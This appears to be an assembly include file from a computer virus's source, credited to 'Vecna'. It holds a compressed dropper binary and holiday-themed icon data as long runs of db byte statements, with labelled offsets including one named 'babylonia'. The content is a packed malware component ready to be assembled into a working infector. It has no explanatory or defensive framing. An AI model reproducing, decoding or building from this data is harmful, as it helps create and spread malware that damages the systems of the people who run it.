;Compressed Dropper&Icon data
;(C) Vecna
dropper equ 0
coelho equ dropper+6144
hallwen equ coelho+1152
jesus equ hallwen+1152
ovo equ jesus+1152
santa equ ovo+1152
babylonia equ santa+1152
icon equ 12c8h
db 0A9h, 0F1h, 034h, 020h, 06Fh, 04Eh, 046h, 0B2h
db 0DAh, 081h, 0EDh, 0AAh, 0F9h, 001h, 0A3h, 0A3h
db 096h, 0B4h, 048h, 0CFh, 011h, 092h, 04Ah, 063h
db 0ADh, 0A6h, 031h, 080h, 0A6h, 0F5h, 056h, 020h
db 07Ch, 050h, 007h, 0B9h, 032h, 0DDh, 006h, 0F6h
db 055h, 090h, 091h, 02Fh, 036h, 044h, 014h, 0ABh
db 0A3h, 0FDh, 05Bh, 020h, 070h, 073h, 0BBh, 0A2h
db 09Dh, 08Dh, 0C0h, 0A8h, 0E8h, 0EBh, 0F6h, 0F9h
db 043h, 0CFh, 051h, 0FEh, 012h, 0A1h, 00Eh, 058h
db 053h, 060h, 07Ch, 054h, 07Ch, 0BBh, 0F6h, 0E3h
db 047h, 09Fh, 06Dh, 0C4h, 0EEh, 08Dh, 0C4h, 046h
db 0CBh, 050h, 038h, 0EFh, 0F7h, 0A9h, 091h, 0CEh
db 046h, 020h, 0BCh, 037h, 032h, 0EBh, 02Bh, 01Dh
db 031h, 0EAh, 0A6h, 0CCh, 0F7h, 00Eh, 0FDh, 0A9h
db 088h, 0CEh, 033h, 0E2h, 081h, 06Ah, 041h, 024h
db 033h, 036h, 07Fh, 009h, 0D5h, 034h, 08Ah, 062h
db 032h, 032h, 05Dh, 0ADh, 0F0h, 0C4h, 0BEh, 0EEh
db 0EFh, 041h, 099h, 033h, 0FFh, 056h, 002h, 006h
db 06Ah, 0EBh, 004h, 001h, 03Fh, 048h, 067h, 08Eh
db 0ECh, 05Ch, 0F5h, 04Ah, 04Ah, 0A1h, 0F7h, 05Bh
db 09Dh, 02Bh, 0EAh, 0C5h, 092h, 043h, 0CCh, 017h
db 0FFh, 054h, 05Dh, 092h, 01Eh, 06Ah, 0E9h, 002h
db 0AAh, 024h, 0B1h, 0B3h, 0BEh, 0FFh, 051h, 0A4h
db 0AEh, 0B6h, 05Ch, 0F9h, 00Eh, 0DBh, 043h, 08Ah
db 026h, 080h, 0ADh, 065h, 063h, 0F1h, 0E7h, 085h
db 049h, 040h, 051h, 004h, 018h, 0E8h, 095h, 054h
db 01Bh, 0FAh, 0A4h, 0F6h, 0BDh, 0DBh, 002h, 070h
db 032h, 058h, 02Bh, 07Bh, 0D6h, 08Ah, 020h, 09Eh
db 036h, 09Ch, 03Ch, 09Ah, 01Ah, 091h, 0EBh, 028h
db 0B4h, 0DBh, 082h, 0A0h, 06Ch, 070h, 088h, 0AFh
db 0EAh, 0DCh, 0BFh, 037h, 0E8h, 026h, 0A7h, 078h
db 0EDh, 0BFh, 0ECh, 0E6h, 0E6h, 0E8h, 043h, 0DFh
db 081h, 066h, 04Ch, 0B8h, 07Dh, 0D3h, 025h, 027h
db 031h, 0BDh, 0B6h, 0C3h, 0CFh, 0C9h, 00Dh, 08Dh
db 060h, 0D5h, 0EFh, 0BFh, 0E9h, 055h, 0FBh, 0CBh
db 076h, 012h, 0A9h, 08Ah, 082h, 033h, 04Bh, 031h
db 0E9h, 0B3h, 0ECh, 0FFh, 0F3h, 074h, 01Eh, 04Dh
db 007h, 0BEh, 04Dh, 087h, 07Bh, 091h, 07Bh, 03Dh
db 06Dh, 084h, 02Eh, 054h, 060h, 095h, 090h, 01Fh
db 087h, 0DBh, 057h, 0E2h, 0C5h, 036h, 0B3h, 01Eh
db 090h, 065h, 092h, 07Bh, 0DAh, 037h, 0EAh, 063h
db 0E8h, 024h, 041h, 0ADh, 009h, 039h, 0EEh, 087h
db 0F6h, 036h, 019h, 0F3h, 099h, 04Eh, 0BAh, 0CCh
db 0E4h, 072h, 0FEh, 0F0h, 0FDh, 044h, 040h, 0D3h
db 01Fh, 0ECh, 0F3h, 0B3h, 033h, 0CCh, 0D6h, 025h
db 0ADh, 069h, 0BDh, 0D4h, 00Eh, 08Fh, 04Dh, 057h
db 050h, 031h, 0A1h, 0A8h, 01Ah, 040h, 0D9h, 0DAh
db 0A6h, 0E7h, 035h, 013h, 065h, 05Ah, 0FEh, 044h
db 003h, 0A1h, 0D0h, 0EBh, 0CAh, 0ADh, 0D3h, 002h
db 064h, 071h, 07Ch, 0FFh, 0B4h, 0C1h, 0D2h, 0DBh
db 0F9h, 049h, 09Ah, 06Ch, 003h, 08Eh, 0EFh, 0B0h
db 02Dh, 0CBh, 006h, 088h, 047h, 03Ch, 057h, 02Dh
db 027h, 01Ch, 020h, 019h, 0E6h, 0A6h, 09Eh, 0D2h
db 0BFh, 05Bh, 06Eh, 020h, 0B9h, 031h, 05Ch, 021h
db 093h, 0A9h, 008h, 020h, 0FEh, 053h, 0ECh, 001h
db 056h, 020h, 052h, 00Dh, 052h, 01Fh, 0CAh, 007h
db 001h, 0ABh, 020h, 0A9h, 00Eh, 02Bh, 022h, 028h
db 01Eh, 055h, 0F6h, 001h, 059h, 020h, 049h, 00Eh
db 0FDh, 0ECh, 059h, 03Eh, 0A5h, 019h, 08Ah, 004h
db 080h, 0D3h, 0FDh, 01Ah, 001h, 084h, 09Ah, 03Fh
db 08Fh, 01Eh, 0F2h, 0CBh, 027h, 053h, 00Dh, 06Ah
db 042h, 020h, 064h, 0F6h, 035h, 02Bh, 001h, 053h
db 020h, 0A7h, 0FFh, 0F1h, 0F7h, 018h, 0FCh, 0A7h
db 041h, 01Bh, 01Dh, 002h, 07Fh, 041h, 08Dh, 035h
db 083h, 066h, 021h, 03Dh, 0E6h, 016h, 0E3h, 049h
db 0DBh, 04Bh, 01Fh, 06Ah, 040h, 021h, 0EAh, 01Fh
db 0B9h, 06Ah, 082h, 022h, 044h, 0ECh, 09Ah, 040h
db 02Bh, 0F6h, 01Fh, 0A9h, 021h, 0A4h, 040h, 04Ah
db 021h, 05Ah, 091h, 020h, 016h, 019h, 023h, 01Dh
db 09Ah, 002h, 0B4h, 0C3h, 0A4h, 060h, 0ADh, 09Dh
db 0B8h, 048h, 003h, 0A7h, 008h, 0D3h, 085h, 07Dh
db 020h, 0C2h, 01Bh, 084h, 09Dh, 05Ah, 0A9h, 01Ch
db 040h, 053h, 053h, 027h, 004h, 09Fh, 0ABh, 080h
db 0EDh, 043h, 04Dh, 044h, 0A9h, 011h, 080h, 052h
db 045h, 064h, 06Ah, 0C0h, 0F2h, 094h, 0E1h, 09Bh
db 018h, 0BDh, 0D7h, 01Fh, 094h, 082h, 0DAh, 028h
db 065h, 067h, 035h, 018h, 079h, 01Fh, 04Dh, 020h
db 04Dh, 001h, 044h, 020h, 0CAh, 0C0h, 089h, 007h
db 01Ch, 071h, 0AFh, 020h, 0B7h, 0B1h, 035h, 0F6h
db 03Dh, 020h, 0FAh, 03Eh, 0D2h, 023h, 03Dh, 0D0h
db 049h, 0CDh, 0F2h, 0C7h, 004h, 0A9h, 05Dh, 035h
db 004h, 06Dh, 08Dh, 049h, 0AEh, 0E6h, 09Eh, 010h
db 0FDh, 05Fh, 0CDh, 06Bh, 0CDh, 036h, 060h, 0B1h
db 070h, 07Ah, 0C5h, 0D2h, 078h, 0FCh, 00Fh, 0C5h
db 098h, 0F8h, 007h, 05Dh, 004h, 0F1h, 01Eh, 03Fh
db 0F0h, 088h, 008h, 00Fh, 0E0h, 03Eh, 0A0h, 0C0h
db 043h, 003h, 0A5h, 019h, 01Ch, 009h, 00Fh, 046h
db 028h, 061h, 053h, 01Fh, 004h, 0E3h, 0FCh, 020h
db 099h, 0FEh, 06Ch, 07Fh, 009h, 0B7h, 0E0h, 0E8h
db 0F0h, 0A4h, 004h, 078h, 003h, 0D5h, 074h, 004h
db 036h, 0F8h, 04Ch, 0EBh, 0E5h, 03Bh, 06Fh, 027h
db 0F1h, 048h, 01Fh, 0C5h, 042h, 0C5h, 06Ch, 00Eh
db 0C3h, 042h, 013h, 019h, 08Fh, 047h, 048h, 04Ah
db 021h, 09Ch, 065h, 0A3h, 0E7h, 013h, 01Dh, 03Fh
db 046h, 0D6h, 040h, 0E1h, 005h, 027h, 021h, 038h
db 0D3h, 06Eh, 038h, 03Eh, 01Bh, 041h, 06Ah, 08Ah
db 00Ch, 021h, 056h, 0DBh, 03Eh, 034h, 0A5h, 066h
db 080h, 009h, 0D5h, 041h, 063h, 0A6h, 0F3h, 0D4h
db 02Dh, 02Fh, 0A5h, 079h, 041h, 0ABh, 07Fh, 08Eh
db 0CAh, 020h, 0B8h, 0C3h, 0DCh, 023h, 0D3h, 055h
db 0BEh, 020h, 0DAh, 092h, 05Ah, 096h, 020h, 0E9h
db 00Fh, 050h, 005h, 01Eh, 0A2h, 020h, 04Ah, 002h
db 095h, 020h, 091h, 042h, 055h, 0DAh, 049h, 020h
db 0E2h, 015h, 0B6h, 028h, 042h, 0ABh, 020h, 053h
db 0D1h, 020h, 0A5h, 037h, 019h, 08Ah, 020h, 06Dh
db 03Eh, 05Fh, 020h, 06Ah, 080h, 05Fh, 04Eh, 011h
db 0DAh, 040h, 0B4h, 0C1h, 0A6h, 061h, 0A5h, 07Fh
db 06Ah, 041h, 04Ah, 082h, 06Ah, 061h, 03Ch, 057h
db 03Fh, 0D5h, 021h, 0DAh, 007h, 092h, 001h, 0B6h
db 01Fh, 0A4h, 020h, 0A1h, 05Fh, 0C9h, 0C5h, 0CFh
db 0C4h, 06Ch, 042h, 0D5h, 03Ch, 020h, 0B4h, 095h
db 0FFh, 048h, 020h, 0BCh, 035h, 043h, 024h, 03Eh
db 0DFh, 022h, 053h, 0C5h, 074h, 053h, 0BCh, 040h
db 05Ah, 0CBh, 0EFh, 0DAh, 089h, 08Dh, 080h, 041h
db 0ADh, 03Eh, 0CDh, 00Dh, 06Ch, 0C5h, 0CFh, 0B7h
db 03Dh, 02Bh, 0B7h, 043h, 00Eh, 010h, 0FFh, 094h
db 022h, 0ABh, 04Fh, 02Eh, 052h, 0F5h, 032h, 001h
db 0FEh, 0E9h, 00Fh, 0C0h, 0AEh, 01Eh, 030h, 08Bh
db 03Fh, 0FCh, 0B1h, 044h, 00Fh, 072h, 08Ch, 095h
db 004h, 097h, 07Fh, 094h, 074h, 084h, 0B9h, 098h
db 04Ch, 089h, 03Fh, 096h, 068h, 043h, 0C0h, 003h
db 0BDh, 0CDh, 0E4h, 0F6h, 02Fh, 0CCh, 081h, 009h
db 0C0h, 089h, 0F1h, 05Ch, 077h, 042h, 0AFh, 09Fh
db 0C7h, 042h, 01Ah, 004h, 032h, 00Bh, 0CBh, 08Eh
db 001h, 008h, 013h, 0B8h, 021h, 0DFh, 029h, 017h
db 0BAh, 0D3h, 040h, 055h, 01Eh, 0C2h, 093h, 020h
db 084h, 065h, 025h, 040h, 065h, 0E1h, 076h, 03Fh
db 046h, 0A6h, 041h, 0AEh, 0FAh, 091h, 001h, 04Eh
db 014h, 03Fh, 092h, 087h, 0B2h, 03Ah, 020h, 064h
db 0FFh, 06Dh, 04Ch, 021h, 00Bh, 0D4h, 007h, 01Fh
db 0F3h, 0D9h, 08Ch, 099h, 045h, 051h, 082h, 090h
db 00Ah, 0C5h, 00Bh, 055h, 001h, 066h, 05Fh, 033h
db 06Eh, 0D9h, 003h, 00Dh, 0FBh, 066h, 09Ch, 018h
db 090h, 05Ch, 00Fh, 069h, 01Fh, 02Bh, 041h, 0B5h
db 032h, 037h, 020h, 08Dh, 0ADh, 046h, 020h, 042h
db 055h, 00Ah, 001h, 0C2h, 0B1h, 0C0h, 0FBh, 04Ch
db 020h, 013h, 0DAh, 012h, 06Dh, 096h, 020h, 0EDh
db 09Bh, 03Bh, 0EDh, 02Ah, 092h, 013h, 09Ah, 020h
db 0AAh, 021h, 041h, 03Ah, 052h, 01Fh, 066h, 055h
db 0EDh, 041h, 047h, 013h, 02Ah, 019h, 021h, 051h
db 090h, 001h, 0B2h, 083h, 054h, 00Fh, 092h, 020h
db 0CAh, 010h, 09Ah, 020h, 0AEh, 021h, 051h, 056h
db 0A0h, 055h, 01Fh, 0CAh, 02Ah, 020h, 038h, 040h
db 01Fh, 0A6h, 021h, 0E7h, 05Dh, 0C0h, 0A9h, 03Ah
db 01Fh, 09Ch, 01Fh, 012h, 0D9h, 08Dh, 02Fh, 0A9h
db 043h, 022h, 0CAh, 01Fh, 0CEh, 03Ch, 020h, 052h
db 0D9h, 021h, 09Ch, 0E2h, 0ABh, 001h, 0E4h, 055h
db 01Fh, 09Ch, 06Bh, 021h, 02Bh, 022h, 0A9h, 01Eh
db 02Bh, 01Fh, 0B9h, 0ABh, 00Ah, 021h, 039h, 0C5h
db 0CEh, 09Ah, 01Eh, 096h, 01Fh, 0E3h, 049h, 021h
db 05Dh, 022h, 055h, 01Eh, 076h, 01Fh, 043h, 0A6h
db 063h, 0A2h, 022h, 0E5h, 068h, 029h, 01Fh, 06Ah
db 001h, 0B8h, 052h, 022h, 0D4h, 01Eh, 0DCh, 021h
db 0CAh, 021h, 06Ah, 022h, 0ABh, 01Eh, 038h, 052h
db 05Ah, 052h, 022h, 0B6h, 03Ch, 0A7h, 09Ah, 029h
db 01Fh, 04Dh, 018h, 02Eh, 08Eh, 0CDh, 051h, 014h
db 05Eh, 040h, 051h, 00Dh, 0ABh, 03Ch, 079h, 0EAh
db 001h, 079h, 013h, 0B5h, 004h, 007h, 02Ah, 018h
db 057h, 049h, 055h, 0FFh, 04Bh, 01Fh, 09Ah, 002h
db 0BAh, 01Eh, 0B9h, 022h, 00Ah, 05Eh, 040h, 09Ah
db 069h, 0BFh, 080h, 014h, 00Ah, 0A2h, 0F9h, 0A9h
db 0FEh, 001h, 0F4h, 0E1h, 01Eh, 0EEh, 023h, 012h
db 010h, 0E3h, 070h, 085h, 0C7h, 03Dh, 01Ah, 01Eh
db 0EFh, 02Dh, 07Fh, 003h, 0C2h, 036h, 020h, 0FBh
db 03Dh, 071h, 00Ch, 045h, 0E3h, 0DAh, 002h, 079h
db 07Fh, 01Bh, 084h, 038h, 037h, 080h, 0FBh, 00Ch
db 0A4h, 01Dh, 0A2h, 020h, 08Ah, 001h, 021h, 071h
db 037h, 045h, 001h, 065h, 01Eh, 053h, 020h, 014h
db 0A6h, 021h, 0B6h, 07Bh, 0C8h, 041h, 00Ch, 04Dh
db 04Ah, 059h, 01Fh, 09Ch, 003h, 01Ch, 06Bh, 03Eh
db 0B5h, 042h, 015h, 01Dh, 020h, 0D4h, 001h, 08Dh
db 016h, 042h, 05Dh, 05Eh, 0D6h, 09Bh, 03Dh, 0BDh
db 029h, 020h, 07Ch, 0CAh, 051h, 020h, 0B9h, 079h
db 052h, 020h, 06Ah, 085h, 07Fh, 053h, 052h, 041h
db 021h, 029h, 037h, 060h, 094h, 0E3h, 080h, 0A9h
db 05Dh, 020h, 045h, 03Fh, 036h, 020h, 00Dh, 0A7h
db 060h, 036h, 002h, 040h, 055h, 031h, 03Fh, 0D6h
db 094h, 0DDh, 0D5h, 042h, 020h, 0E5h, 015h, 021h
db 020h, 092h, 054h, 024h, 060h, 0F7h, 048h, 035h
db 043h, 034h, 040h, 08Ah, 05Fh, 052h, 020h, 08Eh
db 010h, 011h, 09Ah, 0C5h, 0AAh, 07Bh, 0E0h, 0DBh
db 0C5h, 036h, 020h, 042h, 048h, 0FBh, 060h, 0B4h
db 09Eh, 020h, 04Eh, 0B7h, 0A8h, 055h, 062h, 05Dh
db 020h, 023h, 061h, 092h, 02Dh, 0A1h, 0B6h, 042h
db 044h, 0C1h, 093h, 0A0h, 06Ah, 01Fh, 05Ah, 087h
db 021h, 0FBh, 038h, 024h, 061h, 071h, 073h, 0B8h
db 003h, 046h, 0DAh, 044h, 0CBh, 0B2h, 06Fh, 045h
db 00Dh, 034h, 01Eh, 0A9h, 052h, 001h, 00Ah, 0BBh
db 022h, 085h, 02Ah, 001h, 0EAh, 021h, 0FFh, 042h
db 0E0h, 007h, 071h, 0EEh, 012h, 0FCh, 0A2h, 084h
db 0E2h, 080h, 007h, 001h, 049h, 0D9h, 051h, 0F2h
db 0B2h, 01Ch, 0D1h, 00Ch, 0EAh, 040h, 02Dh, 014h
db 000h, 0D5h, 0B1h, 001h, 0B9h, 04Ah, 0A1h, 0E2h
db 0F6h, 00Eh, 070h, 09Ah, 00Ch, 092h, 004h, 05Ch
db 060h, 043h, 007h, 0D7h, 06Fh, 002h, 0B2h, 0D4h
db 062h, 05Ah, 087h, 029h, 0FDh, 005h, 057h, 027h
db 05Fh, 0BAh, 00Bh, 08Ah, 010h, 020h, 0B5h, 021h
db 01Bh, 020h, 060h, 0FDh, 0A8h, 051h, 0DFh, 0A8h
db 021h, 0FFh, 03Ah, 035h, 020h, 05Bh, 021h, 002h
db 028h, 040h, 0EBh, 014h, 0ABh, 061h, 053h, 037h
db 021h, 06Ah, 007h, 020h, 039h, 0BAh, 0F9h, 0C5h
db 0F7h, 0ECh, 067h, 04Eh, 0B0h, 0D4h, 02Ah, 0D5h
db 020h, 010h, 0DCh, 0F9h, 04Eh, 096h, 01Bh, 041h
db 06Dh, 00Fh, 026h, 008h, 046h, 062h, 011h, 0D4h
db 00Ah, 041h, 0D4h, 020h, 06Ah, 0CCh, 09Fh, 04Dh
db 038h, 0C7h, 055h, 007h, 044h, 04Dh, 0A3h, 0E6h
db 085h, 041h, 0F9h, 025h, 020h, 059h, 052h, 038h
db 017h, 0C7h, 0A2h, 0F6h, 09Ah, 020h, 08Ah, 060h
db 020h, 0EFh, 014h, 0CDh, 061h, 0E3h, 00Ah, 017h
db 096h, 0C7h, 09Eh, 0BFh, 0A4h, 020h, 0D9h, 063h
db 040h, 0F9h, 01Dh, 0B6h, 0C2h, 05Ah, 042h, 0DCh
db 03Eh, 09Bh, 06Ch, 0B5h, 052h, 01Bh, 020h, 0DCh
db 061h, 0A8h, 015h, 033h, 06Ch, 02Ah, 003h, 096h
db 051h, 012h, 002h, 0FAh, 08Dh, 020h, 0DEh, 0CBh
db 056h, 043h, 040h, 04Eh, 0CDh, 0E2h, 057h, 01Fh
db 0FAh, 006h, 029h, 020h, 0EFh, 0F3h, 0A1h, 098h
db 0D6h, 093h, 001h, 0D5h, 035h, 00Bh, 03Dh, 020h
db 047h, 015h, 0FBh, 0E3h, 092h, 07Ah, 024h, 0AAh
db 001h, 0ACh, 064h, 022h, 0F9h, 0A6h, 020h, 0ABh
db 021h, 072h, 03Bh, 0A4h, 021h, 0DAh, 013h, 043h
db 09Ch, 020h, 0E7h, 0F2h, 08Dh, 01Dh, 044h, 05Dh
db 007h, 049h, 083h, 0D3h, 0FDh, 02Dh, 020h, 025h
db 0E8h, 0ABh, 03Bh, 007h, 037h, 043h, 0A8h, 028h
db 0D6h, 0A5h, 020h, 0BEh, 0C6h, 078h, 085h, 02Ah
db 0A2h, 0D4h, 040h, 060h, 0F5h, 03Dh, 001h, 095h
db 07Ch, 0F6h, 020h, 072h, 08Ch, 0A9h, 021h, 0F6h
db 049h, 003h, 0DEh, 0A9h, 03Fh, 02Eh, 0E9h, 0AAh
db 0DCh, 040h, 0EEh, 09Ah, 02Fh, 0A9h, 019h, 02Ah
db 0AAh, 01Eh, 026h, 00Eh, 06Ah, 01Fh, 02Bh, 040h
db 029h, 082h, 028h, 044h, 090h, 0E3h, 0D3h, 03Fh
db 037h, 089h, 03Dh, 03Bh, 0CAh, 0BBh, 060h, 0AAh
db 007h, 094h, 001h, 0D4h, 038h, 01Fh, 0DCh, 0E9h
db 080h, 0CDh, 0E3h, 0AAh, 0E0h, 002h, 0F1h, 056h
db 01Eh, 03Fh, 0A5h, 020h, 06Dh, 006h, 059h, 024h
db 059h, 01Fh, 04Eh, 060h, 029h, 0F6h, 004h, 035h
db 084h, 066h, 07Ch, 003h, 056h, 0D7h, 020h, 069h
db 045h, 0D9h, 09Eh, 045h, 0F9h, 029h, 001h, 04Bh
db 020h, 06Ah, 0C9h, 01Eh, 0F3h, 053h, 03Eh, 020h
db 099h, 003h, 0DCh, 015h, 054h, 019h, 007h, 08Ah
db 0D7h, 020h, 0F3h, 0FCh, 055h, 01Bh, 056h, 01Fh
db 073h, 094h, 042h, 0F5h, 071h, 0EDh, 05Fh, 020h
db 0B5h, 07Fh, 021h, 029h, 0F7h, 02Ah, 04Dh, 003h
db 055h, 007h, 068h, 020h, 01Bh, 0D5h, 086h, 04Ah
db 0D2h, 01Fh, 077h, 0B6h, 002h, 043h, 0D4h, 006h
db 015h, 0DBh, 00Ch, 052h, 025h, 032h, 07Bh, 09Ah
db 030h, 071h, 0ECh, 091h, 0DFh, 0CAh, 022h, 0B6h
db 008h, 024h, 0D4h, 042h, 02Eh, 08Fh, 0FFh, 05Bh
db 011h, 038h, 044h, 05Dh, 0CAh, 033h, 09Ch, 01Bh
db 055h, 01Eh, 040h, 0FFh, 06Ah, 042h, 004h, 05Ch
db 0B6h, 042h, 08Dh, 0ACh, 03Fh, 0D4h, 0D3h, 040h
db 0DBh, 060h, 055h, 044h, 045h, 04Dh, 063h, 043h
db 041h, 00Eh, 06Fh, 002h, 028h, 075h, 013h, 06Ah
db 081h, 04Dh, 03Fh, 0D1h, 001h, 0F6h, 096h, 040h
db 02Ah, 00Eh, 05Dh, 061h, 0A4h, 040h, 0D4h, 0E1h
db 015h, 07Dh, 0A6h, 03Fh, 0FFh, 009h, 052h, 040h
db 0F7h, 033h, 0EDh, 01Bh, 005h, 034h, 052h, 026h
db 03Fh, 09Bh, 01Eh, 0F5h, 022h, 0FFh, 0D3h, 09Ch
db 040h, 0D5h, 07Eh, 07Fh, 094h, 071h, 07Dh, 0A9h
db 09Fh, 0D3h, 0FDh, 0D1h, 059h, 040h, 0B5h, 032h
db 022h, 02Dh, 03Fh, 0CAh, 093h, 020h, 089h, 0D1h
db 007h, 0CAh, 09Ch, 040h, 0A5h, 03Fh, 02Ah, 0A0h
db 0ABh, 040h, 03Ah, 002h, 0FFh, 06Dh, 065h, 07Fh
db 0C7h, 094h, 069h, 055h, 0A0h, 035h, 040h, 055h
db 001h, 03Fh, 0A6h, 061h, 0FBh, 022h, 050h, 053h
db 040h, 072h, 0A3h, 026h, 0E7h, 00Ah, 03Fh, 052h
db 0AAh, 07Fh, 0FFh, 0B7h, 081h, 0C8h, 0CDh, 054h
db 0F2h, 092h, 040h, 093h, 03Fh, 0A5h, 033h, 0DFh
db 0EDh, 052h, 0BCh, 040h, 0D4h, 03Fh, 0F4h, 08Dh
db 01Fh, 094h, 068h, 0D1h, 040h, 0B2h, 0EDh, 012h
db 0B2h, 03Fh, 08Ah, 07Fh, 09Fh, 029h, 040h, 0CAh
db 03Fh, 054h, 0A7h, 040h, 0B5h, 01Ch, 069h, 03Fh
db 0ABh, 03Eh, 040h, 04Eh, 011h, 0D4h, 03Fh, 092h
db 054h, 01Dh, 021h, 094h, 040h, 0A4h, 0D8h, 09Eh
db 0F9h, 0A4h, 03Fh, 0E3h, 032h, 081h, 095h, 040h
db 093h, 02Dh, 0A7h, 0E2h, 066h, 005h, 0A4h, 0FEh
db 0A5h, 022h, 035h, 003h, 09Ah, 00Ah, 07Bh, 0B3h
db 017h, 069h, 0ABh, 0F8h, 015h, 029h, 0BFh, 05Ah
db 02Fh, 000h, 0A2h, 0CFh, 096h, 004h, 01Fh, 0C7h
db 0F8h, 003h, 09Dh, 0C1h, 038h, 009h, 00Fh, 080h
db 0F0h, 0E1h, 0FCh, 030h, 00Dh, 0C2h, 097h, 004h
db 029h, 001h, 059h, 001h, 05Bh, 004h, 021h, 003h
db 0E3h, 007h, 0C0h, 0F3h, 0F0h, 0A7h, 02Dh, 0B6h
db 0E1h, 0FCh, 0EBh, 056h, 0CEh, 078h, 060h, 000h
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DROPPER.INC]ÄÄÄ